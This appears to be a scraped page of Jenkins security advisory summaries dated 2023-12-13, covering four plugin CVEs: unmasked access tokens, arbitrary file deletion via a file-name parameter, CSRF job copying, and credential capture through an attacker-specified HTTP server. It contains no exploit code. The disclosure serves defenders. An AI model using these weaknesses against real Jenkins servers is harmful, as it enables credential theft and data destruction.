*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2979, SECURITY-3092
*   **Steve Marlowe <smarlowe@cisco.com> of Cisco ASIG** for SECURITY-3168

CVE-2023-50777: Jenkins Security Advisory 2023-12-13

Jenkins Dingding JSON Pusher Plugin 2.0 and earlier does not mask access tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them.

CVE-2023-50773: Jenkins Security Advisory 2023-12-13

Jenkins Scriptler Plugin 342.v6a_89fd40f466 and earlier does not restrict a file name query parameter in an HTTP endpoint, allowing attackers with Scriptler/Configure permission to delete arbitrary files on the Jenkins controller file system.

CVE-2023-50764: Jenkins Security Advisory 2023-12-13

A cross-site request forgery (CSRF) vulnerability in Jenkins Deployment Dashboard Plugin 1.0.10 and earlier allows attackers to copy jobs.

CVE-2023-50775: Jenkins Security Advisory 2023-12-13

Missing permission checks in Jenkins Nexus Platform Plugin 3.18.0-03 and earlier allow attackers with Overall/Read permission to connect to an attacker-specified HTTP server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Search

lenovo warranty check/lookup | check warranty status | lenovo support us